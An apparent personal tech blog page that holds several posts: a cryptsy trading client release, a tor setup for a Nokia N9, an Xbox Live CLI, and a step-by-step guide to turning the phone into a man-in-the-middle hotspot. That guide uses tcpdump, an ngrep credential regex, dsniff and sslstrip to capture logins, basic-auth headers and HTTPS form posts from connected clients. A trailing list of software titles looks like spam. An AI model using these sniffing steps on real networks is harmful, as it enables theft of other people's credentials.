true-binary.com – code is poetry…

HOME

pcryptsy – a graphical cryptsy.com – trading client

12.01.2014 (11:27 pm) – Filed under: bitcoin, coding, computing, linux, python

pcryptsy is a GUI for cryptsy.com with the ability to calculate and plot charts




icon128
pcryptsy is a complete python application with PyQt4 frontend (QtCore, QtGui, QtWebkit).

It’s using a modified version of PyCryptsy module to connect to the official cryptsy.com web-API.

You need to have python-matplotlib installed to plot graphics – pcryptsy is using parsed JSON data from website to get the coin values (files can get up to ~10Mb)



  • keep overview of your current balances:

mybalances_fin


  • keep track of current altcoin values as well as sell/buy orders:

sellbuyorders_fin


  • create and delete buy/sell orders:

order_fin


  • view live-website inside:

webkit_fin


  • calculate and plot EMA chart based on the last 22 days:

EMA_fin_big



  • debian requirements:

python-qt4
python-matplotlib


  • to install requirements:

sudo apt-get update && sudo apt-get install python-qt4 python-matplotlib



All you need is your cryptsy.com API Public Key and Private Key (cryptsy.com – settings)


  • To run it, simply type:



./pcryptsy

or

python pcryptsy


Here is a beta version which was tested on a debian system (python3)

as well as on a Windows XP SP3 (python 2.7):



  pcryptsy_v0.2beta.tar.gz (20.0 KiB, 723 hits)


MD5: 08d20dca5f4e716bbd31c5eae297a062

  pcryptsy_v0.2beta.zip (19.0 KiB, 715 hits)


MD5: ed8b9f217e549aa125e98f2bad4a06ba

Try it and have fun!


DONATE:


BTC

1rrXXfv8k9o469s5Rri2Udv6S37fPea55


LTC

LhEuWFTiwbUAHXhmX1H9ayCrAPy98jFvwN



BTW: I tryed to create, both, linux and windows executables – linux executables work with a size around 100MB which is too big in my opinion and windows? god damn, who needs it anyway…



1rrXXfv8k9o469s5Rri2Udv6S37fPea55

the n9 as an evil access point #mitm

01.02.2013 (1:22 am) – Filed under: computing, debian, linux, meego

Prelude: I used it in all these tools for development and privat use, e.g. you shouldn’t use it in a coffee-shop, call your hotspot “Free-Wifi” and turn the encryption off :P

The last month I looked for a way to use my n9 as package sniffer and I figured out some usefull stuff …

… my train of thought was – how can I sniff whatever it’s transmitted through my stock wifi-hotspot (joikuspot) …

… so here’s a guideline of what I got working and how it works:

mitm

My device:

Nokia n9, Linux RM 696 2.6.32.54-dfl-161-20121301 open mode, meego Harmattan PR1.3

Pre-dependencies:


I AM WORKING IN OPEN MODE, SO I DONT KNOW IF IT WORKS WITH THE STOCK KERNEL!!!


1. tcpdump + tcpxtract
2. ngrep
3. dsniff [dsniff itself]
4. ssldump?


1. tcpdump + tcpxtract:

tcpdump is a very powerful package analyzer – you can dump nearly all traffic with this tool …

tcpxtract is a tool to rebuild data from tcpdump-pcap files…

let’s install the packages [and dependencies]:

apt-get install tcpdump libpcap0.8

I took the tcpxtract_1.0.1-5_armel package out of the debian repository.

dpkg -i tcpxtract_1.0.1-5_armel.deb

now fire up the wifi hotspot, connect with a client and let the magic begin:

mkdir tcpxtract_out/
tcpdump -i wlan0 -n -s 1500 -w tcpdump_http.pcap port 80

# we are starting tcpdump on interface [-i] wlan0, set the snaplen to 1500 [-s], don’t convert addresses to names [-n] and listen only on port 80 [port 80]

open a website on the client … tcpdump will capture it.

when you think you are finished, kill tcpdump [crtl+c]

now we will convert the captured traffic:

/home/user/dev/tcpplay # tcpxtract -f tcpdump_http.pcap -o tcpxtract_out/

Found file of type “html” in session [82.150.199.80:20480 -> 192.168.20.20:25055], exporting to tcpxtract_out/00000000.html
Found file of type “png” in session [82.150.199.80:20480 -> 192.168.20.20:25055], exporting to tcpxtract_out/00000001.png
Found file of type “png” in session [82.150.199.80:20480 -> 192.168.20.20:25055], exporting to tcpxtract_out/00000002.png
Found file of type “png” in session [192.168.20.20:26079 -> 82.150.199.80:20480], exporting to tcpxtract_out/00000003.png

Found file of type “png” in session [92.122.212.57:20480 -> 192.168.20.20:30431], exporting to tcpxtract_out/00000021.png

it looks like this.

I LIKE! :)

2. ngrep

ngrep is a very powerful tool as well – you can analyze traffic live…

I’m going to show you how to filter the traffic by some regular expressions to look for logins:

first install the necessary dependencies and ngrep itself:

apt-get install lipcap0.8

here’s ngrep_1.45.ds2-9_armel [from debian repository]

dpkg -i ngrep ngrep_1.45.ds2-9_armel.deb

now fire up the wifi hotspot, connect with a client and let the magic begin [again ;) ]:

/home/user/dev/sniffer # ngrep ‘[&\s?](?:login|user(?:name|)|p(ass(?:word|wd|)|w|wd))[\s:=]\s?([^&\s]*)’ -q -i -d gprs0 port 80 or port 25 or port 110 -l
interface: gprs0 (123.123.123.123/255.255.255.255)
filter: (ip or ip6) and ( port 80 or port 25 or port 110 )
match: [&\s?](?:login|user(?:name|)|p(ass(?:word|wd|)|w|wd))[\s:=]\s?([^&\s]*)

T 123.123.123.123:61342 -> 82.150.199.80:80 [AP]
log=ohyes&pwd=itworks&wp-submit=Log+In&redirect_to=http%3A%2F%2Fwww.true-binary.com%2Fwp-admin%2F&testcookie=1

# we are starting ngrep with a regular expression filter, tell it to be quiet [-q], to ignore case [-i], to use interface gprs0 [-d] (i had segment faults when I started it on wlan0 … from time to time), -l to make the stdout line buffered [-l] (usefull when capturing to a file {2>&1 >ngrep.log}) and filter the traffic by ports [port 80 or port 25 or port 110]

… What it doesn’t do is capturing htaccess logins, I use dsniff for it.

3. dsniff

dsniff? – omg, it’s awesome! it includes:

arpspoof  – Send out unrequested (and possibly forged) arp replies.
dnsspoof  – forge replies to arbitrary DNS address / pointer queries on the Local Area Network.
dsniff    – password sniffer for several protocols.
filesnarf – saves selected files sniffed from NFS traffic.
macof     – flood the local network with random MAC addresses.
mailsnarf – sniffs mail on the LAN and stores it in mbox format.
msgsnarf  – record selected messages from different Instant Messengers.
sshmitm   – SSH monkey-in-the-middle. proxies and sniffs SSH traffic.
sshow     – SSH traffic analyser.
tcpkill   – kills specified in-progress TCP connections.
tcpnice   – slow down specified TCP connections via “active” traffic shaping.
urlsnarf  – output selected URLs sniffed from HTTP traffic in CLF.
webmitm   – HTTP / HTTPS monkey-in-the-middle. transparently proxies.
webspy    – sends URLs sniffed from a client to your local browser (requires libx11-6 installed).

dsniff does have some more dependencies than the other tools I described:

I took the libdb4.6_4.6.21-16_armel and libnids1.21_1.23-2_armel from the debian repository.

Here’s dsniff_2.4b1+debian-18_armel

apt-get install libnet1 libpcap0.8 libssl0.9.8 openssl

dpkg -i libdb4.6_4.6.21-16_armel.deb

dpkg -i libnids1.21_1.23-2_armel.deb

dpkg -i dsniff_2.4b1+debian-18_armel.deb

whooop! – should be working now :)

dsniff itself is very simple to use – it has a build-in filter. I used it to sniff the authentication for htaccess logins as well as ftp logins:

/home/user/dev/sniffer # dsniff -m -s 1500 -i gprs0
dsniff: listening on gprs0

—————–
01/31/13 10:45:02 tcp 123.123.123.123.61056 -> p111.111.111.111.some.isp.com.80 (http)
GET / HTTP/1.0
host: server.idonttellyou.com
authorization: Basic dGhpc2lzOmh0YWNjZXNzZHVtcA== [thisis:htaccessdump]

—————–
01/31/13 10:47:22 tcp 123.123.123.123.57838 -> 82.150.199.80.21 (ftp)
USER thisis
PASS ftpdump

# we are starting dsniff with automatic protocol detection [-m], set the snaplen to 1500 [-s] and listen on interface gprs0 [-i] … again I got segment faults when listening on wlan0.

4. sslstrip?

sslstrip strips down your https connections to http …

… I found a way to pipe your local connection through sslstrip, but not with the hotspot connected client.

All I did was to modify my APN connection – I activated the http_proxy on 127.0.0.1 and port 10000, and changed a gconf setting (gconftool-2 -t string -s /system/proxy/mode “manual”) – deactivate and activate the connection again and fire up sslstrip.

An alternative for testing is to set the http proxy in firefox.

What I figured out was: The Joikuspot doesn’t use the APN entry from the phone settings, because I tried to add a second APN with some changed settings and it won’t show up in the properties of Joikuspot. – Maybe that’s why it doesn’t take the proxy settings from the APN … anyway, I’m still working on a workaround!

Here’s sslstrip-0.9 (taken from http://www.thoughtcrime.org/)

/home/user/dev/sniffer/# apt-get install python-twisted-web

/home/user/dev/sniffer # tar xzf sslstrip-0.9.tar.gz && cd sslstrip-0.9

/home/user/dev/sniffer/sslstrip-0.9 # python setup.py build
running build
running build_py
running build_scripts
copying and adjusting sslstrip/sslstrip -> build/scripts-2.6
Cleaning up…

/home/user/dev/sniffer/sslstrip-0.9 # python setup.py install
running install
running build
running build_py
running build_scripts
copying and adjusting sslstrip/sslstrip -> build/scripts-2.6
running install_lib
running install_scripts
copying build/scripts-2.6/sslstrip -> /usr/local/bin
changing mode of /usr/local/bin/sslstrip to 755
running install_data
running install_egg_info
Removing /usr/local/lib/python2.6/dist-packages/sslstrip-0.9.egg-info
Writing /usr/local/lib/python2.6/dist-packages/sslstrip-0.9.egg-info
Cleaning up…

/home/user/dev/sniffer/sslstrip-0.9 # ln -s /usr/local/bin/sslstrip /usr/bin/

/home/user/dev/sniffer/sslstrip-0.9 # gconftool-2 -t string -s /system/proxy/mode “manual”

/home/user/dev/sniffer/sslstrip-0.9 # sslstrip -l 10000 -w ../sslstrip.log &

/home/user/dev/sniffer/sslstrip-0.9 # tail -f ../sslstrip.log

2013-01-31 23:57:56,683 SECURE POST Data (www.facebook.com):
lsd=AVpjTuuG&email=thisis%40just.an&pass=example&default_persistent=0&charset_test=%E2%82%AC%2C%C2%B4%2C%E2%82%AC%2C

… I also got the webmitm/mitmproxy running (fakes SSL-certifications, but as it’s not a very efficient and elegant way to work, so I won’t explain it)

cheers!

tor (the onion router) on meego harmattan

19.12.2012 (9:50 pm) – Filed under: Uncategorized, meego

tor-170x170

here’s a quick and dirty howto run the tor-service on your meego/harmattan device for anonymous internet traffic:

pre-dependencies:

  • inception
  • opensh_1.00_armel (incept the package … you need it to gain more rights)

after the inception of opensh, you can try to check if it worked:

~ $ id
uid=29999(user) gid=29999(users) groups=0(root),20(dialout),44(video),670(pulse-access),29999(users),30011(metadata-users),30016(gallerycoredata-users),30019(calendar),9990210,9990276,9990277,9990279,9990281, 9990282,9990284,9990285,9990286,9990287,9990288,9990289,9990609
~ $ opensh

/home/user # id
uid=0(root) gid=0(root) groups=0(root),1(daemon),2(bin),3(sys),4(adm),5(tty),6(disk),7(lp),8(mail), 9(news),10(uucp),12(man),13(proxy),15(kmem),20(dialout),21(fax),22(voice), 24(cdrom),25(floppy),26(tape),27(sudo),29(audio),30(dip),33(www-data),34(backup),37(operator),38(list),39(irc),40(src),41(gnats),42(shadow), 43(utmp),44(video),45(sasl),46(plugdev),50(staff),60(games),100(libuuid), 101(debian-tor),669(pulse),670(pulseaccess),671(pulsert),29996(cal), 29999(users),30002(input),30003(i2c),30004(adc),30005(upstart),30010(crypto), 30011(metadatausers),30012(phonet),30013(signon),30014(csd), 30015(messagebus),30016(gallerycoredatausers),30017(acm), 30018(osa),30019(calendar),30020(libaccountsnoa),30021(lpm), 30022(visualreminder),30023(nfc),30024(location),30025(slpgwd), 30026(haldaemon),30027(powerdev),30028(developer),30029(ssh),65100(spool), 65534(nogroup),9990001,9990004,9990245,9990256,9990257,9990258,9990259, 9990260,9990261,9990262,9990263,9990264,9990265,9990266,9990270,9990276, 9990277,9990279,9990281,9990282,9990284,9990285, 9990286,9990287,9990288,9990289,9990294,9990297,9990298,9990300, 9990301,9990302,9990306,9990307,9990308,9990309,9990313,9990314, 9990315,9990316,9990317,9990320,9990326,9990327, 9990330,9990331,9990332,9990334,9990337,9990346,9990352,9990353, 9990355,9990356,9990361,9990367,9990368,9990374,9990376,9990377, 9990381,9990382,9990384,9990385,9990387,9990388, 9990390,9990391,9990393,9990394,9990396,9990397,9990401,9990402, 9990403,9990404,9990405,9990406,9990407,9990408,9990409,9990410, 9990413,9990414,9990415,9990416,9990417,9990418, 9990419,9990420,9990421,9990422,9990423,9990424,9990427,9990430, 9990433,9990438,9990439,9990440,9990442,9990448,9990453,9990454, 9990466,9990478,9990482,9990483,9990491,9990492, 9990493,9990494,9990497,9990500,9990501,9990508,9990511,9990512, 9990521,9990526,9990534,9990536,9990547,9990574,9990575,9990577, 9990578,9990588,9990590,9990594,9990649

whooop … looks good!

now we come to some tricky stuff:

  1. enable rzr’s repository (setup repository)
  2. install tor through command line: apt-get install tor

… apt will now go crazy with alot of permission errors:

  • chown: /var/lib/tor: Operation not permitted

to fix this – change the ownership for all the errors manually (through opensh):

  • chown debian-tor:debian-tor /var/lib/tor
  • chown debian-tor:debian-tor /var/run/tor

… now we have to check if we use our phone as dns-server …

the file “/etc/resolv.conf” should contain the following string:

nameserver 127.0.0.1

… the next step is to configure the torrc file “/etc/tor/torrc”

mine looks like this:

SocksPort 9050 # what port to open for local application connections
SocksListenAddress 127.0.0.1 # accept connections only from localhost
VirtualAddrNetwork 10.192.0.0/10
AutomapHostsOnResolve 1
TransPort 9040
DNSPort 53
RunAsDaemon 1

… tor should be staring up as a daemon now! :)

to make things easier, I packed some scripts together to handle tor through 3 desktop icons:

  1. to start tor for all traffic
  2. to start tor in background (for example: in fennec/firefox set socks proxy to localhost:9050)
  3. to stop tor and unset system-wide proxy settings

2012-12-19_20-28-47

here you can download torswitch0.1

cheers!

delete desktop folders in meego Harmattan through command line …

18.12.2012 (3:54 pm) – Filed under: meego

the location of the folders is:

/home/user/.local/share/applications

… folders are saved under folder*.directory … (* sequential number)

/home/user/.local/share/applications # cat folder13.directory
[Desktop Entry]
Type=Directory
Name=tor
X-MeeGo-Folder-Index=13
Icon=icon-l-default-application

ghost folders can be removed through command line,

cheers

meexbox-cli … CLI for xbox live

04.12.2012 (7:23 pm) – Filed under: codes, meego
hi folks!
i was searching for an easy way to check if my xbox-live friends are online and what they are up to…
… since microsoft xbox live doesn’t have no official api, I found a website which offers json-data in return of requesting an url with the given xbox-live username!
… I packed it all together to a python-script with a CLI, where you can add, delete and check the online status of your friends.
NOTICE: The OnlineStatus is not always shown – it depends on your xbox-privacy settings!!!

I was searching for an easy way to check if my xbox-live friends are online and what they are up to…

… since microsoft xbox live doesn’t have no official api, I found a website which offers json-data in return of requesting an url with the given xbox-live username!

… I packed it all together to a python-script with a CLI, where you can add, delete and check the online status of your friends.

NOTICE: The OnlineStatus is not always shown – it depends on your xbox-privacy settings!!!

meexbox_cli preview

download the tool: meexbox_cli.deb (armel)

download the source: meexbox_cli_source.tar.gz

cheers


 

windows 7 professional |
cubase 6 |
cleanmymac 2 |
microsoft excel 2013 |
right hemisphere deep exploration cad edition 6.5 |
matlab |
autodesk autocad 2012 |
adobe captivate 5 |
rosetta stone german |
microsoft publisher 2013 |
stellar phoenix data recovery 6 |
windows 7 ultimate |
apple motion 5 |
autocad autocad 2011 lt |
windows server 2008 enterprise |
corel draw x6 |
autodesk maya 2012 |
autodesk autocad design suite 2014 |
office 2013 professional |
microsoft works 9 |
microsoft office 2007 |
microsoft publisher 2013 |
nuance pdf converter professional 6 |
microsoft mappoint 2013 |
word 2007 |